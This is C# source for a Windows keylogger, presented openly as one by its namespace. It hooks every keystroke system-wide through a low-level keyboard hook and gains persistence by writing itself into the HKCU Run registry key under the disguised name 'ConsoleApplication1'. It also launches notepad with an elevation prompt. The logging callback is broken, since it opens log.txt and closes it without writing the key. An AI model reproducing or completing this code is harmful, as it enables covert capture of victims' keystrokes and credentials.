registry

using System;
using Microsoft.Win32;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
using System.Threading;
using System.Windows.Forms;
using System.IO;
using System.Diagnostics;


namespace keylogger
{
    public class Program
    {

        private const int WH_KEYBOARD_LL = 13;
        private const int WM_KEYDOWN = 0x0100;
        private static LowLevelKeyboardProc _proc = HookCallBack;
        private static IntPtr _hookID = IntPtr.Zero;

        static void Main()
        {
            Prog.RunRegistry();

            _hookID = SetHook(_proc);
            Application.Run();
            UnhookWindowsHookEx(_hookID);
        }

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool UnhookWindowsHookEx(IntPtr hhk);

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

        [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr GetModuleHandle(string lpModuleName);

        private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);

        private static IntPtr SetHook(LowLevelKeyboardProc proc)
        {
            using (Process curProcess = Process.GetCurrentProcess())
            using (ProcessModule curModule = curProcess.MainModule)
            {
                return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
            }
        }

        private static IntPtr HookCallBack(int nCode, IntPtr wParam, IntPtr lParam)
        {
            if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
            {
                int vkCode = Marshal.ReadInt32(lParam);
                //Console.WriteLine((Keys)vkCode);
                StreamWriter sw = new StreamWriter(Application.StartupPath + @"\log.txt", true);
                sw.Close();
            }

            return CallNextHookEx(_hookID, nCode, wParam, lParam);
        }
    }


    public class Prog
    {
        public static void RunRegistry()
        {
            var exPath = Application.ExecutablePath;
            var reg = Registry.CurrentUser.GetValue("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ConsoleApplication1", exPath);

            if (reg != null)
            {
                var Reg = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);

                if (Reg != null)
                {
                    var path = Reg.GetValue("ConsoleApplication1", exPath).ToString();
                    var res = path.Equals("\"" + exPath + "\"", StringComparison.Ordinal);
                    Reg.SetValue("ConsoleApplication1", "\"" + Application.ExecutablePath + "\"");

                }
                Reg.Close();
            }
            if (reg == null)
            {
                var add = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
                if (add == null)
                {
                    return;
                }
                add.SetValue("ConsoleApplication1", "\"" + Application.ExecutablePath + "\"");
                add.Close();


            }
            var info = new ProcessStartInfo(@"C:\Windows\System32\notepad.exe")
            {
                UseShellExecute = true,
                Verb = "runas"
            };
            Process.Start(info);
        }
    }
}